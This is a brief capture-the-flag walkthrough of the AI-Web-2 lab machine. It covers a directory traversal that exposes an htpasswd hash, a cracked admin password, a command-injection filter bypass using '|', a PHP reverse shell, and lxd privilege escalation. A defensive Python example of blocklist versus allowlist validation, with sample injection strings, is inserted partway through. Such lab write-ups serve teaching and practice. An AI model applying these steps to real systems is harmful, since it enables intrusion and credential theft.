Target VM download link:
https://www.vulnhub.com/entry/ai-web-2,357
Host port scan:
Tried SQL injection and found no injection vulnerability, so registered an account
http://10.10.202.160/userpage.php
Searching the vulnerability database:
XuezhuLi FileSharing - Directory Traversal
https://www.exploit-db.com/exploits/40009
Let's brute-force the directories and take a look
╰─ sudo python3 dirsearch.py -u http://10.10.202.160/ -e .php
Let's try including the Apache authentication file and take a look
aiweb2admin:$apr1$VXqmVvDD$otU1gx4nwCgsAOA7Wi.aU/
╰─ john --wordlist=/usr/share/wordlists/rockyou.txt htpwd
aiweb2admin:c.ronaldo
After trying && ; | it turned out that | bypasses the filter and executes commands
Visit: http://10.10.202.160/webadmin/H05Tpin9555/php-reverse.php
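The behaviour noted above (&& and ; rejected, | accepted) is what a token blocklist produces. The following is an added example, not code from the target application or from this write-up: it contrasts a constructed blocklist with an allowlist check, assuming the field is meant to carry a host for a ping-style command. All function names and sample inputs are hypothetical.

```python
import ipaddress
import re

# Hypothetical blocklist reproducing the behaviour described above:
# "&&" and ";" are rejected, "|" is not.
BLOCKED_TOKENS = ("&&", ";")

# One DNS label: alphanumeric at both ends, hyphens allowed inside.
LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOSTNAME_RE = re.compile(LABEL + r"(?:\." + LABEL + r")*")

def blocklist_accepts(value):
    """Weak check: accept anything that lacks a listed token."""
    return not any(tok in value for tok in BLOCKED_TOKENS)

def allowlist_accepts(value):
    """Strict check: the whole input must be an IP literal or a hostname."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        pass
    return len(value) <= 253 and HOSTNAME_RE.fullmatch(value) is not None

def build_argv(value):
    """Return an argument vector meant for subprocess.run(argv) without
    shell=True, so no shell ever parses the user-supplied value."""
    if not allowlist_accepts(value):
        raise ValueError("rejected host argument")
    return ["ping", "-c", "1", value]

# Constructed sample inputs (the address is the lab target used on this page).
SAMPLES = [
    "10.10.202.160",
    "10.10.202.160&&id",
    "10.10.202.160;id",
    "10.10.202.160|id",
    "10.10.202.160\nid",
    "$(id)",
]

def compare(samples):
    """Map each sample to (blocklist verdict, allowlist verdict)."""
    return {s: (blocklist_accepts(s), allowlist_accepts(s)) for s in samples}

if __name__ == "__main__":
    for sample, (weak, strict) in compare(SAMPLES).items():
        print(repr(sample), "blocklist:", weak, "allowlist:", strict)
```

The blocklist also lets the newline and $( ) samples through, which is why validating the expected shape of the input and avoiding the shell are the fix rather than adding | to the list.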
Next, privilege escalation:
find / -perm -u=s -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null
n0nr00tuser@aiweb2host:/tmp$ ./LinEnum.sh
╰─ searchsploit lxd
Create the file hack.sh and copy the script contents from the following link into hack.sh
https://www.exploit-db.com/exploits/46978
OVER !!